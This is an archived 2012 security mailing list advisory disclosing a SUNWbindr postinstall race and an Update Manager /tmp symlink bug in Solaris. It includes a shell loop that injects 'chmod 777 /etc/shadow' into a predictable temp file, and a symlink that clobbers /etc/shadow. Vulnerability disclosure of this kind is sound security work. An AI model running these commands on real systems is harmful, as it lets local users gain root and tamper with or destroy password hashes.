lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-id: <1aad3ffa-a4fa-45dc-bfd3-af431c2d7051@me.com>
Date: Fri, 20 Jul 2012 23:40:45 +0000 (GMT)
From: larry Cashdollar <larry0@...com>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: file clobbering vulnerability in Solaris update
 manager & local root with SUNWbindr install.

+= Local Root

If the system administrator is updating the system using update manager or smpatch (multi user mode) a race condition exists with the postinstall script for SUNWbindr that may lead to arbitrary code execution as root if the race is won.


vulnerable code in:

  ./patches/119784-22/SUNWbindr/install/pkg_postinstall: UPGRADE=${TMP}/BIND_UPGRADE
  ./patches/119784-22/SUNWbindr/install/postinstall: UPGRADE=${TMP}/BIND_UPGRADE

vulnerable code:

  UPGRADE=${TMP}/BIND_UPGRADE
  rm -f $UPGRADE

  (If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)

  cat >> $UPGRADE <<-\_UPDATE_START_METHOD
  oset=$@ # Remember current options if any.
  svc="svc:network/dns/server"
  if [ -z "$TMP" ]; then
TMP="/tmp"
  fi

If the following is run:

while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done

during patch installation you can get /etc/shadow world writeable.

+= File Clobbering Vulnerability

Noticed this during routine patching.

/tmp file clobbering vulnerability in Sun Update manager.
7/15/2012

if Solaris Update Manager is run by root and a malicious user creates a symlink in /tmp

larry@...aragua:/tmp$ ln -s /etc/shadow  com.sun.swup.client.LOCK


larry@...aragua:/tmp$ ls -l /etc/shadow
-r--------   1 root     sys          0 Jul 19 18:49 /etc/shadow

SunOS n1caragua 5.10 Generic_147441-19 i86pc i386 i86pc
larry@...aragua:~$ 

truss output:

4841/2:         stat64("/tmp/com.sun.swup.client.LOCK", 0xD03FEAB0) = 0
4841/2:         open64("/tmp/com.sun.swup.client.LOCK", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5

Larry W. Cashdollar
http://vapid.dhs.org    @lcashdol


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ